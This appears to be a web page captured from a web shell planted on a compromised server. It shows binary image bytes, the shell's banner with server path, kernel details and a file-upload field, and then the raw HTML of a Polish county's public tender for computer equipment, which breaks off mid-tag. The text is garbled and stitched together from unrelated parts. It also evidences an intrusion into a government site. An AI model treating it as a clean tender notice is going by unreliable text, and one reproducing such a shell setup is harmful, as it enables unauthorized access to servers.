JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241203/0063033001-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Zakup sprzętu i urządzeń komputerowych na potrzeby Starostwa Powiatowego w Polkowicach” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Polkowicki</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 390647239</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">św. Sebastiana 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Polkowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">59-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL516 - Legnicko-głogowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">SEKRETARIAT@POWIATPOLKOWICKI.PL</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://powiatpolkowicki.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Starostwo Powiatowe w Polkowicach</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">NIP: 692 21 24 216</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">św. Sebastiana 1</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Polkowice</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">59-100</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL516 - Legnicko-głogowski</span></h3> <h3 class="mb-0">1.11.9.) Numer telefonu: <span class="normal">76 746 15 00</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">SEKRETARIAT@POWIATPOLKOWICKI.PL</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">https://samorzad.gov.pl/web/powiat-polkowicki</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Zakup sprzętu i urządzeń komputerowych na potrzeby Starostwa Powiatowego w Polkowicach” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5356b3c9-9eaa-4ae8-b3ba-951dfcd5cdb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00630330</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00086372/15/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.4 Zakup sprzętu i urządzeń komputerowych na potrzeby Starostwa Powiatowego w Polkowicach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-5356b3c9-9eaa-4ae8-b3ba-951dfcd5cdb9 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl.<br/>2. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>3. Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej (nie dotyczy to składania ofert wraz z załącznikami) na adres e-mail Zamawiającego podany w pkt. I niniejszej SWZ oraz adresy e-mail Wykonawców podane jako wiążące do komunikacji w toku postępowania (e-mail zwrotny lub e-mail do kontaktu określony w ofercie).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Dokumenty elektroniczne (oferta, oświadczenia oraz wszelkie dokumenty przekazywane Zamawiającemu w postępowaniu), o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub w konkursie (Dz. U. z 2020 r. poz. 2452), sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów z dnia 21 maja 2024 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (Dz. U. poz. 773), z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki. <br/>2.	Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub w konkursie (Dz. U. z 2020 r. poz. 2452), przekazywane w postępowaniu sporządza się w postaci elektronicznej: <br/>a)	w formatach danych określonych w przepisach rozporządzenia Rady Ministrów z dnia 21 maja 2024 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (Dz. U. poz. 773), i przekazuje się jako załącznik, lub <br/>b)	jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści wiadomości e-mail lub w treści „Formularza do komunikacji”). <br/>3. Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do<br/>komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji”<br/>odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do<br/>komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”).<br/>4. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>5. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający informuje, że:<br/>1) administratorem Pani/Pana danych osobowych jest Starosta Polkowicki z siedzibą ul. św. Sebastiana 1, 59-100 Polkowice;<br/>2) administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail: iod@powiatpolkowicki.pl bądź ul. św. Sebastiana 1, 59-100 Polkowice;<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym bez negocjacji art. 6 ust. 1 lit. b RODO do podjęcia działań przed zawarciem umowy, a następnie w celu zawarcia i wykonywania umowy;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>szczególności w oparciu o art. 18 oraz art. 74 ustawy PZP; Pani/Pana dane osobowe mogą być udostępniane podmiotom świadczącym Administratorowi usługi, które dla realizacji celów są niezbędne, w tym w szczególności podmiotom świadczącym usługi informatyczne, wsparcia technicznego i organizacyjnego;<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy PZP przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy PZP;<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22<br/>RODO;<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;*<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;**<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) Nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>Wykonawca, ubiegając się o udzielenie zamówienia publicznego, zobowiązany jest do wypełnienia obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO wobec osób fizycznych, od których dane osobowe bezpośrednio lub pośrednio pozyskał w celu ubiegania się o udzielenie zamówienia publicznego w niniejszym postępowaniu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OA.272.5.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">11</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1: Skaner:<br/>Fabrycznie nowy skaner w ilości 1 szt. o minimalnych wymaganiach technicznych:<br/>Format: A4;<br/>Dobowy cykl pracy: 3000 stron;<br/>Skanowanie w kolorze: tak;<br/>Optyczna rozdzielczość skanowania: 600 x 600 dpi;<br/>Rozszerzona rozdzielczość skanowania: 1200 x 1200 dpi;<br/>Szybkość skanowania: 40 stron / minutę;<br/>Skanowanie dwustronne: tak;<br/>Automatyczny podajnik dokumentów: tak;<br/>Skanowanie z szyby (flatbed): tak;<br/>Pojemność automatycznego podajnika dokumentów: 80;<br/>Obsługiwane formaty nośników: A4, A5, A6, A8;<br/>Interfejs komunikacyjny: USB;<br/>Sterownik skanera: TWAIN, ISIS;<br/>Funkcje skanera: automatyczne wykrywanie kolorów, wykrywanie pustych stron, usuwanie dziurek, odkrzywianie, korekcja krawędzi, automatyczne wykrywanie rozmiaru strony;<br/>Oprogramowanie skanera dostępne dla systemów: Windows 7, 8, 10 i 11;<br/>Gwarancja: 24 miesiące<br/><br/>Parametry nie mogą być gorsze od podanych w specyfikacji.<br/>W przypadku gdy w opisie do SWZ są użyte nazwy własne można je zastąpić innym sprzętem o parametrach równoważnych lub lepszych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30200000-1 - Urządzenia komputerowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30216110-0 - Skanery komputerowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty dla każdej części Zamawiający będzie się kierował następującymi kryteriami oceny ofert:</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2: Access Point:<br/>Fabrycznie nowy Access Point w ilości 3 szt. o minimalnych wymaganiach technicznych:<br/>Typ pracy: Access Point;<br/>Port RJ-45: 10/100/1000 Ethernet;<br/>Obsługiwane standardy Wi-Fi: 802.11 a/b/g/n/ac;<br/>Zabezpieczenia transmisji bezprzewodowej: WEP, WPA-PSK, WPA-Enterprise (WPA/WPA2, TKIP/AES);<br/>Obsługiwane pasma: 2.4 GHz oraz 5 GHz;<br/>Przyciski: reset;<br/>Anteny: dla pasma 5GHz - 3x3 MIMO, dla pasma 2.4 GHz - 3x3 MIMO;<br/>Zarządzanie: WWW;<br/>Zasilanie: PoE;<br/>Montaż na ścianie: tak, uchwyt w zestawie;<br/>Gwarancja: 24 miesiące<br/><br/>Parametry nie mogą być gorsze od podanych w specyfikacji.<br/>W przypadku gdy w opisie do SWZ są użyte nazwy własne można je zastąpić innym sprzętem o parametrach równoważnych lub lepszych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">32420000-3 - Urządzenia sieciowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty dla każdej części Zamawiający będzie się kierował następującymi kryteriami oceny ofert:</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 3: Projektor:<br/>Fabrycznie nowy Projektor w ilości 1 szt. o minimalnych wymaganiach technicznych:<br/>Typ matrycy: LCD;<br/>Jasność: 900 ANSI lumenów;<br/>Współczynnik kontrastu: 3000:1;<br/>Rozdzielczość podstawowa: 1920x1080 px;<br/>Zakres rozmiaru rzucanego obrazu: od 55 do 120 cali;<br/>Korekcja pionowa: automatyczna;<br/>Żywotność lampy: 30000 godzin;<br/>Łączność bezprzewodowa: WiFi, Bluetooth;<br/>Wejście: 1x HDMI, 1x USB;<br/>Wyjście: 1x audio;<br/>Obsługa z pilota: tak;<br/>Wbudowane głośniki: tak;<br/>Funkcje dodatkowe: auto fokus, skalowanie;<br/>Wbudowany system android: tak;<br/>Prezentacja obrazu bez komputera: tak;<br/>Wyposażenie dodatkowe: pilot, zasilacz, kabel zasilający;<br/>Gwarancja: 24 miesiące<br/><br/>Parametry nie mogą być gorsze od podanych w specyfikacji.<br/>W przypadku gdy w opisie do SWZ są użyte nazwy własne można je zastąpić innym sprzętem o parametrach równoważnych lub lepszych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">38652100-1 - Projektory</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty dla każdej części Zamawiający będzie się kierował następującymi kryteriami oceny ofert:</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 